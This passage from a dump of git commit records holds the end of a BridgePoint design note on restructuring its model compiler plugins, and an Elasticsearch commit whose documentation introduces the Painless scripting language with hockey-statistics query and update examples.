functionality\nstated above is implemented.\n\n4.1.2 MC-Java\n\nThe MC-Java plugin was cleaned up and renamed from `org.xtuml.bp.mc.java.source`\nto simply `org.xtuml.bp.mc.java`. The MC nature and builder names were changed\nand updated in the source projects that use them. MC-Java was removed from the\nlist of available model compilers. It can still be configured manually by\nediting the `.project` file, but it is not used by BridgePoint users other than\nby the BridgePoint project itself, so it only confuses new users.\n\n4.1.3 Docgen\n\nThe `org.xtuml.bp.docgen` plugin was removed. A new plugin\n`org.xtuml.bp.mc.docgen` as introduced following the same pattern as the other\nMC plugins. The behavior found in the `Generator` class in the old docgen plugin\nwas adapted to work as a builder. 
The \"Create Documentation\" CME associated with\ndocgen is removed and instead it is executed during builds. Docgen is now\navailable in the list of model compilers when creating a new project or setting\nmodel compilers.\n\n4.1.3.1 Preferences\n\nA new preference page was added for projects configured with the docgen nature.\nThe output destination can be configured. The builder can be configured to open\nthe output file when finished. The defaults are the `doc\/` directory and to\nalways open the output. This mirrors current behavior.\n\nimage::docgen_prefs.png[docgen_prefs.png,width=75%]\n\n4.2 Delegating wizards\n\nA mechanism exists for creating new projects and setting model compilers called\n\"delegating wizards.\" The idea is that model compiler plugins can dynamically\ncontribute wizard pages to the new project wizard without re-building\nBridgePoint using an Eclipse extension point. This is very handy if users want\nto develop their own model compiler plugins and access them through the UI.\n\nBefore now, exactly one model compiler must be assigned to each project. This work\nextended the delegating wizard framework such that zero to many model compilers\ncan be assigned to any project. A project could have both docgen and MC-3020 or\na project could simply have no model compilers. With this change the \"None\"\nmodel compiler went away.\n\nimage::mcs.png[mcs.png,width=75%]\n\nOnce one or more model compilers are selected, if they have additional\nconfiguration, those wizard pages are added to the new project wizard.\n\nRead more about delegating wizards at <<dr-5>>.\n\n4.3 Console management\n\nModel compilers now get first class consoles. A utility class\n`ModelCompilerConsoleManager` was added to handle the common functionality of\ndealing with consoles. An output and error stream are opened to the console to\nwhich the `stdout` and `stderr` of the model compiler executables are piped. The\nerror stream prints to the console in red. This class also re-directs the output\nto Eclipse standard out and standard error for CLI builds.\n\n4.4 Project preferences\n\nProject preferences were moved to the \"Properties\" menu of a project. This is\nwhere most Eclipse tools handle project specific preferences but BridgePoint\nprovided its own CME. With this change, BridgePoint is much more like other\nEclispe based tools. The old project preferences CME was removed and the\n\"Properties\" CME was added for model explorer.\n\nimage::project_prefs.png[project_prefs.png,width=75%]\n\nimage::properties_cme.png[properties_cme.png,width=50%]\n\n4.5 General code cleanup\n\nCode was cleaned up where applicable.\n\n4.5.1 `org.xtuml.bp.mc.template`\n\nThe template model compiler plugin was removed. This provided a mechanism to\nquickly create new model compiler plugin projects. It is a good idea but it is\nnot being used and it currently does not work. It may be a future project to\nreintroduce something like the template plugin but for now it is simply\nremoved. Read more about when this was introduced at <<dr-5>>.\n\n4.5.2 `org.xtuml.internal.test`\n\nThe `org.xtuml.internal.test` plugin was removed. This test only had files\nwhich were used to test the old delegating wizard framework with respect to\ncreating new model compiler plugins using the template plugin. The delegating\nwizard framework has been updated and the template plugin has been removed so\nthese tests are deprecated. 
These tests are not run automatically and have not\nbeen run recently.\n\n4.5.3 BridgePoint CLI\n\nThe CLI plugin had to be updated to properly refer to the new model compiler\nplugins. An attempt was made to overhaul the CLI build so that it would be\nbetter, however there were problems affecting the BridgePoint build and these\nchanges were reverted.\n\n== 5 Implementation Comments\n\n5.1 Future enhancements\n\n5.1.1 RSL builder\n\nA future enhancement that could be made is to implement a generic RSL model\ncompiler. This would essentially just be an interface to `pyrsl`. See <<dr-6>>.\n\n5.1.2 Purely headless CLI build\n\nAs mentioned above, some work was done to make build purely headless. It ran\ninto problems, but there is no real reason this cannot be done. It is faster,\nlighter, and removes the requirement of a virtual frame buffer. See <<dr-7>>.\n\n5.1.3 Template plugin\n\nA new model compiler template plugin could be introduced as mentioned above.\nSee <<dr-8>>.\n\n5.2 Existing project migration\n\nWith this version of BridgePoint, projects currently using a BridgePoint model\ncompiler will need to be upgraded. Since this only affects Eclipse support\nfiles, the decision was made not to implement a migration tool or provide legacy\nsupport for older projects.\n\n5.2.1 Procedure\n\nUse the following procedure to update existing models. It is recommended that\nprojects that are not in revision control be backed up before an upgrade is\nattempted.\n\n. Right click on the project and select \"Properties\"\n. In the \"Builders\" section, select \"Missing builder\n (org.xtuml.bp.mc.*.export_builder)\" and click \"Remove\"\n. In the \"Builders\" section, select \"Missing Compiler\" and click \"Remove\"\n. Click \"Apply and Close\"\n. Right click on the project and select \"BridgePoint Utilities > Set Model\n Compilers\"\n. Follow the wizard to enable your desired model compiler(s)\n\n5.2.2 BridgePoint development projects\n\nThe BridgePoint plugin projects which use MC-Java have been updated to use the\nnew nature and builder identifiers introduced by this work. Therefore,\nBridgePoint must be built with this version of BridgePoint or later. The build\nserver will need to be updated once this work is promoted. <<dr-3>> is raised to\ntrack this upgrade.\n\nThe model compiler projects (MASL tools, docgen, mcmc, etc) have also been\nupgraded to be compatible with this version of BridgePoint. \n\nThe `MicrowaveOven` and `GPS_Watch` projects included with BridgePoint in the\nwelcome plugin will no longer build. <<dr-4>> is raised to track the upgrade of\nthose projects.\n\nOther projects in the `models` repository will need to be upgraded, however this\ncan be done at a later time as needed.\n\n== 6 Unit Test\n\n6.1 Current unit test suite shall pass.\n\n6.1.1 Existing unit tests that are deprecated by this work shall be removed.\n\n6.1.2 Existing unit tests that are still valid but broken by this work shall be\nrepaired.\n\n== 7 User Documentation\n\n7.1 Project preferences\n\nReferences to the project preferences menu item in the documentation have been\nupdated to correctly refer to the \"Properties\" menu. 
Changes were made in the\n\"Preferences\" documentation, the \"MASL Modeling and Conversion Guide\" page, and\nthe \"BridgePoint Context Menu Tools\" page.\n\n7.2 CME menus\n\nIn addition to the project preferences, the following changes have been made to\nthe \"BridgePoint Context Menu Tools\" page.\n\n7.2.1 Create Documentation has been removed\n\n7.2.2 Set Model Compiler has been changed to \"Set Model Compilers\" and the\ndescription has been updated\n\n== 8 Code Changes\n\n- fork\/repository: leviathan747\/bridgepoint\n- branch: 11491_mcs\n\n----\n TODO once Bob's branch is merged\n----\n\n- fork\/repository: leviathan747\/bptest\n- branch: 11491_mcs\n\n----\n TODO once Bob's branch is merged\n----\n\n- fork\/repository: leviathan747\/mc\n- branch: 11491_mcs\n\n----\n TODO once Bob's branch is merged\n----\n\n== 9 Document References\n\n. [[dr-1]] https:\/\/support.onefact.net\/issues\/11491[11491 - Clean up model compiler projects]\n. [[dr-2]] https:\/\/support.onefact.net\/issues\/10345[10345 - update unit tests as needed to account for the move to Eclipse Oxygen]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/11636[11636 - Update build server with new host version of BP]\n. [[dr-4]] https:\/\/support.onefact.net\/issues\/11637[11637 - Upgrade welcome plugin projects]\n. [[dr-5]] https:\/\/github.com\/xtuml\/graveyard\/tree\/master\/internal\/Documentation_archive\/20121102\/technical\/notes\/dts0100782775[Documentation associated with the introduction of the model compilers]\n. [[dr-6]] https:\/\/support.onefact.net\/issues\/11638[11638 - Create a generic RSL model compiler]\n. [[dr-7]] https:\/\/support.onefact.net\/issues\/11640[11640 - Update CLI to run truely headless]\n. [[dr-8]] https:\/\/support.onefact.net\/issues\/11639[11639 - Reintroduce a model compiler template plugin]\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d43417ef47f69089ac054ea30ec75dae4584d2bc","subject":"Docs: Deleted redundant word in scripting","message":"Docs: Deleted redundant word in 
scripting\n","repos":"s1monw\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,umeshdangat\/elasticsearch,nilabhsagar\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,geidies\/elasticsearch,lks21c\/elasticsearch,glefloch\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,i-am-Nathan\/elasticsearch,winstonewert\/elasticsearch,brandonkearby\/elasticsearch,njlawton\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,MisterAndersen\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,scottsom\/elasticsearch,Stacey-Gammon\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,scottsom\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,MisterAndersen\/elasticsearch,brandonkearby\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,s1monw\/elasticsearch,artnowo\/elasticsearch,masaruh\/elasticsearch,nilabhsagar\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,brandonkearby\/elasticsearch,i-am-Nathan\/elasticsearch,LeoYao\/elasticsearch,MisterAndersen\/elasticsearch,LeoYao\/elasticsearch,Helen-Zhao\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,LewayneNaidoo\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ZTE-PaaS\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,fernandozhu\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,elasticdog\/elasticsearch,njlawton\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,jprante\/elasticsearch,wenpos\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,alexshadow007\/elasticsearch,gfyoung\/elasticsearch,StefanGor\/elasticsearch,artnowo\/elasticsearch,LewayneNaidoo\/elasticsearch,gfyoung\/elasticsearch,Helen-Zhao\/elasticsearch,geidies\/elasticsearch,ZTE-PaaS\/elasticsearch,uschindler\/elasticsearch,brandonkearby\/elasticsearch,mortonsykes\/elasticsearch,MisterAndersen\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch,glefloch\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,JSCooke\/elasticsearch,Helen-Zhao\/elasticsearch,glefloch\/elasticsearch,obourgain\/elasticsearch,rlugojr\/elasticsearch,i-am-Nathan\/elasticsearch,a2lin\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elasticdog\/elasticsearch,artnowo\/elasticsearch,mjason3\/elasticsearch,njlawton\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,njlawton\/elasticsearch,winstonewert\/elasticsearch,rajanm\/elasticsearch,artnowo\/elasticsearch,alexshadow007\/elasticsearch,LewayneNaidoo\/elasticsearch,LewayneNaidoo\/elasticsearch,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,LeoYao\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,naveenhooda2000\/elasticsearch,winstonewert\/elasticsearch,Shepard1212\/elasticsearch,ginger
wizard\/elasticsearch,obourgain\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,obourgain\/elasticsearch,nilabhsagar\/elasticsearch,sneivandt\/elasticsearch,StefanGor\/elasticsearch,shreejay\/elasticsearch,kalimatas\/elasticsearch,C-Bish\/elasticsearch,robin13\/elasticsearch,JackyMai\/elasticsearch,StefanGor\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,bawse\/elasticsearch,njlawton\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,fernandozhu\/elasticsearch,mikemccand\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,vroyer\/elasticassandra,nezirus\/elasticsearch,vroyer\/elasticassandra,fred84\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,geidies\/elasticsearch,nazarewk\/elasticsearch,elasticdog\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,JackyMai\/elasticsearch,mikemccand\/elasticsearch,mohit\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,wangtuo\/elasticsearch,wangtuo\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,geidies\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,Helen-Zhao\/elasticsearch,masaruh\/elasticsearch,HonzaKral\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,MisterAndersen\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,a2lin\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,artnowo\/elasticsearch,Stacey-Gammon\/elasticsearch,JackyMai\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,gfyoung\/elasticsearch,mortonsykes\/elasticsearch,IanvsPoplicola\/elasticsearch,gingerwizard\/elasticsearch,mikemccand\/elasticsearch,strapdata\/elassandra,nazarewk\/elasticsearch,LeoYao\/elasticsearch,C-Bish\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,geidies\/elasticsearch,mohit\/elasticsearch,mortonsykes\/elasticsearch,mohit\/elasticsearch,mikemccand\/elasticsearch,JackyMai\/elasticsearch,ZTE-PaaS\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elasticassandra,vroyer\/elassandra,Helen-Zhao\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,geidies\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,JSCooke\/elasticsearch,wenpos\/elasticsearch,mikemccand\/elasticsearch,fernandozhu\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,elasticdog\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,StefanGor\/elasticsearch,JackyMai\/elasticsearch,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,obourgain\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,vroyer\/elassandra,wenpos\/elasticsearch,mohit\/elasticsearch,kalimatas\/elasticsearch,nilabhsagar\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elast
icsearch,jprante\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,kalimatas\/elasticsearch,i-am-Nathan\/elasticsearch,wenpos\/elasticsearch,naveenhooda2000\/elasticsearch,rlugojr\/elasticsearch,rlugojr\/elasticsearch,bawse\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,robin13\/elasticsearch,alexshadow007\/elasticsearch,obourgain\/elasticsearch,winstonewert\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,shreejay\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,a2lin\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,masaruh\/elasticsearch,nazarewk\/elasticsearch,nknize\/elasticsearch,mortonsykes\/elasticsearch,LewayneNaidoo\/elasticsearch,C-Bish\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,bawse\/elasticsearch","old_file":"docs\/reference\/modules\/scripting\/painless.asciidoc","new_file":"docs\/reference\/modules\/scripting\/painless.asciidoc","new_contents":"[[modules-scripting-painless]]\n=== Painless Scripting Language\n\nexperimental[The Painless scripting language is new and is still marked as experimental. The syntax or API may be changed in the future in non-backwards compatible ways if required.]\n\n_Painless_ is a simple, secure scripting language available in Elasticsearch\nby default. It is designed specifically for use with Elasticsearch and can\nsafely be used with `inline` and `stored` scripting, which is enabled by\ndefault.\n\nThe Painless syntax is similar to http:\/\/groovy-lang.org\/index.html[Groovy].\n\nYou can use Painless anywhere a script can be used in Elasticsearch. It is the\ndefault if you don't set the `lang` parameter but if you want to be explicit you\ncan set the `lang` parameter to `painless`.\n\n[[painless-features]]\n[float]\n== Painless Features\n\n* Fast performance: https:\/\/benchmarks.elastic.co\/index.html#search_qps_scripts[several times faster] than the alternatives.\n\n* Safety: Fine-grained whitelist with method call\/field granularity. See\n<<painless-api-reference>> for a complete list of available classes and methods.\n\n* Optional typing: Variables and parameters can use explicit types or the dynamic `def` type.\n\n* Syntax: Extends Java's syntax with a subset of Groovy for ease of use. 
See the <<modules-scripting-painless-syntax, Syntax Overview>>.\n\n* Optimizations: Designed specifically for Elasticsearch scripting.\n\n[[painless-examples]]\n[float]\n== Painless Examples\n\nTo illustrate how Painless works, let's load some hockey stats into an Elasticsearch index:\n\n[source,js]\n----------------------------------------------------------------\nPUT hockey\/player\/_bulk?refresh\n{\"index\":{\"_id\":1}}\n{\"first\":\"johnny\",\"last\":\"gaudreau\",\"goals\":[9,27,1],\"assists\":[17,46,0],\"gp\":[26,82,1],\"born\":\"1993\/08\/13\"}\n{\"index\":{\"_id\":2}}\n{\"first\":\"sean\",\"last\":\"monohan\",\"goals\":[7,54,26],\"assists\":[11,26,13],\"gp\":[26,82,82],\"born\":\"1994\/10\/12\"}\n{\"index\":{\"_id\":3}}\n{\"first\":\"jiri\",\"last\":\"hudler\",\"goals\":[5,34,36],\"assists\":[11,62,42],\"gp\":[24,80,79],\"born\":\"1984\/01\/04\"}\n{\"index\":{\"_id\":4}}\n{\"first\":\"micheal\",\"last\":\"frolik\",\"goals\":[4,6,15],\"assists\":[8,23,15],\"gp\":[26,82,82],\"born\":\"1988\/02\/17\"}\n{\"index\":{\"_id\":5}}\n{\"first\":\"sam\",\"last\":\"bennett\",\"goals\":[5,0,0],\"assists\":[8,1,0],\"gp\":[26,1,0],\"born\":\"1996\/06\/20\"}\n{\"index\":{\"_id\":6}}\n{\"first\":\"dennis\",\"last\":\"wideman\",\"goals\":[0,26,15],\"assists\":[11,30,24],\"gp\":[26,81,82],\"born\":\"1983\/03\/20\"}\n{\"index\":{\"_id\":7}}\n{\"first\":\"david\",\"last\":\"jones\",\"goals\":[7,19,5],\"assists\":[3,17,4],\"gp\":[26,45,34],\"born\":\"1984\/08\/10\"}\n{\"index\":{\"_id\":8}}\n{\"first\":\"tj\",\"last\":\"brodie\",\"goals\":[2,14,7],\"assists\":[8,42,30],\"gp\":[26,82,82],\"born\":\"1990\/06\/07\"}\n{\"index\":{\"_id\":39}}\n{\"first\":\"mark\",\"last\":\"giordano\",\"goals\":[6,30,15],\"assists\":[3,30,24],\"gp\":[26,60,63],\"born\":\"1983\/10\/03\"}\n{\"index\":{\"_id\":10}}\n{\"first\":\"mikael\",\"last\":\"backlund\",\"goals\":[3,15,13],\"assists\":[6,24,18],\"gp\":[26,82,82],\"born\":\"1989\/03\/17\"}\n{\"index\":{\"_id\":11}}\n{\"first\":\"joe\",\"last\":\"colborne\",\"goals\":[3,18,13],\"assists\":[6,20,24],\"gp\":[26,67,82],\"born\":\"1990\/01\/30\"}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\n[float]\n=== Accessing Doc Values from Painless\n\nDocument values can be accessed from a `Map` named `doc`.\n\nFor example, the following script calculates a player's total goals. This example uses a strongly typed `int` and a `for` loop.\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"function_score\": {\n \"script_score\": {\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"int total = 0; for (int i = 0; i < doc['goals'].length; ++i) { total += doc['goals'][i]; } return total;\"\n }\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nAlternatively, you could do the same thing using a script field instead of a function score:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"match_all\": {}\n },\n \"script_fields\": {\n \"total_goals\": {\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"int total = 0; for (int i = 0; i < doc['goals'].length; ++i) { total += doc['goals'][i]; } return total;\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nThe following example uses a Painless script to sort the players by their combined first and last names. 
The names are accessed using\n`doc['first'].value` and `doc['last'].value`.\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"match_all\": {}\n },\n \"sort\": {\n \"_script\": {\n \"type\": \"string\",\n \"order\": \"asc\",\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"doc['first.keyword'].value + ' ' + doc['last.keyword'].value\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Updating Fields with Painless\n\nYou can also easily update fields. You access the original source for a field as `ctx._source.<field-name>`.\n\nFirst, let's look at the source data for a player by submitting the following request:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"stored_fields\": [\n \"_id\",\n \"_source\"\n ],\n \"query\": {\n \"term\": {\n \"_id\": 1\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nTo change player 1's last name to `hockey`, simply set `ctx._source.last` to the new value:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/1\/_update\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = params.last\",\n \"params\": {\n \"last\": \"hockey\"\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nYou can also add fields to a document. For example, this script adds a new field that contains\nthe player's nickname, _hockey_.\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/1\/_update\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = params.last; ctx._source.nick = params.nick\",\n \"params\": {\n \"last\": \"gaudreau\",\n \"nick\": \"hockey\"\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[modules-scripting-painless-dates]]\n=== Dates\n\nDate fields are exposed as\n<<painless-api-reference-org-joda-time-ReadableDateTime, `ReadableDateTime`>>s\nso they support methods like\n<<painless-api-reference-org-joda-time-ReadableDateTime-getYear-0, `getYear`>>\nand\n<<painless-api-reference-org-joda-time-ReadableDateTime-getDayOfWeek-0, `getDayOfWeek`>>.\nTo get milliseconds since epoch, call\n<<painless-api-reference-org-joda-time-ReadableInstant-getMillis-0, `getMillis`>>.\nFor example, the following returns every hockey player's birth year:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"script_fields\": {\n \"birth_year\": {\n \"script\": {\n \"inline\": \"doc.born.value.year\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[modules-scripting-painless-regex]]\n=== Regular expressions\n\nNOTE: Regexes are disabled by default because they circumvent Painless's\nprotection against long-running and memory-hungry scripts. To make matters\nworse, even innocuous-looking regexes can have staggering performance and stack\ndepth behavior. They remain an amazingly powerful tool but are too scary to enable\nby default. To enable them yourself, set `script.painless.regex.enabled: true` in\n`elasticsearch.yml`. 
We'd like very much to have a safe alternative\nimplementation that can be enabled by default, so check this space for later\ndevelopments!\n\nPainless's native support for regular expressions provides the following syntax constructs:\n\n* `\/pattern\/`: Pattern literals create patterns. This is the only way to create\na pattern in Painless. The pattern inside the ++\/++'s is just a\nhttp:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/regex\/Pattern.html[Java regular expression].\nSee <<modules-scripting-painless-regex-flags>> for more.\n* `=~`: The find operator returns a `boolean`, `true` if a subsequence of the\ntext matches, `false` otherwise.\n* `==~`: The match operator returns a `boolean`, `true` if the text matches,\n`false` if it doesn't.\n\nUsing the find operator (`=~`) you can update all hockey players with \"b\" in\ntheir last name:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"if (ctx._source.last =~ \/b\/) {ctx._source.last += \\\"matched\\\"} else {ctx.op = 'noop'}\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nUsing the match operator (`==~`) you can update all the hockey players whose\nnames start with a consonant and end with a vowel:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"if (ctx._source.last ==~ \/[^aeiou].*[aeiou]\/) {ctx._source.last += \\\"matched\\\"} else {ctx.op = 'noop'}\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nYou can use `Pattern.matcher` directly to get a `Matcher` instance and\nremove all of the vowels in all of their last names:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = \/[aeiou]\/.matcher(ctx._source.last).replaceAll('')\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n`Matcher.replaceAll` is just a call to Java `Matcher`'s\nhttp:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/regex\/Matcher.html#replaceAll-java.lang.String-[replaceAll]\nmethod, so it supports `$1` and `\\1` for replacements:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = \/n([aeiou])\/.matcher(ctx._source.last).replaceAll('$1')\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nIf you need more control over replacements, you can call `replaceAll` on a\n`CharSequence` with a `Function<Matcher, String>` that builds the replacement.\nThis does not support `$1` or `\\1` to access replacements because you already\nhave a reference to the matcher and can get them with `m.group(1)`.\n\nIMPORTANT: Calling `Matcher.find` inside the function that builds the\nreplacement is rude and will likely break the replacement process.\n\nThis will make all of the vowels in the hockey players' last names upper case:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = ctx._source.last.replaceAll(\/[aeiou]\/, m 
-> m.group().toUpperCase(Locale.ROOT))\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nOr you can use `CharSequence.replaceFirst` to make the first vowel in their\nlast names upper case:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = ctx._source.last.replaceFirst(\/[aeiou]\/, m -> m.group().toUpperCase(Locale.ROOT))\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n\nNote: all of the `_update_by_query` examples above could really do with a\n`query` to limit the data that they pull back. While you *could* use a\n<<query-dsl-script-query>>, it wouldn't be as efficient as using any other query\nbecause script queries aren't able to use the inverted index to limit the\ndocuments that they have to check.\n\n[float]\n[[modules-scripting-painless-dispatch]]\n=== How Painless dispatches functions\n\nPainless uses receiver, name, and https:\/\/en.wikipedia.org\/wiki\/Arity[arity]\nfor method dispatch. For example, `s.foo(a, b)` is resolved by first getting\nthe class of `s` and then looking up the method `foo` with two parameters. This\nis different from Groovy, which uses the\nhttps:\/\/en.wikipedia.org\/wiki\/Multiple_dispatch[runtime types] of the\nparameters, and from Java, which uses the compile-time types of the parameters.\n\nThe consequence of this is that Painless doesn't support overloaded methods like\nJava, leading to some trouble when it whitelists classes from the Java\nstandard library. For example, in Java and Groovy, `Matcher` has two methods:\n`group(int)` and `group(String)`. Painless can't whitelist both of these methods\nbecause they have the same name and the same number of parameters. So instead it\nhas <<painless-api-reference-Matcher-group-1, `group(int)`>> and\n<<painless-api-reference-Matcher-namedGroup-1, `namedGroup(String)`>>.\n\nWe have a few justifications for this different way of dispatching methods:\n\n1. It makes operating on `def` types simpler and, presumably, faster. Using\nreceiver, name, and arity means when Painless sees a call on a `def` object it\ncan dispatch the appropriate method without having to do expensive comparisons\nof the types of the parameters. The same is true for invocations with `def`\ntyped parameters.\n2. It keeps things consistent. It would be genuinely weird for Painless to\nbehave like Groovy if any `def` typed parameters were involved and Java\notherwise. It'd be slow for it to behave like Groovy all the time.\n3. It keeps Painless maintainable. Adding Java- or Groovy-like method\ndispatch *feels* like it'd add a ton of complexity which'd make maintenance and\nother improvements much more difficult.\n","old_contents":"[[modules-scripting-painless]]\n=== Painless Scripting Language\n\nexperimental[The Painless scripting language is new and is still marked as experimental. The syntax or API may be changed in the future in 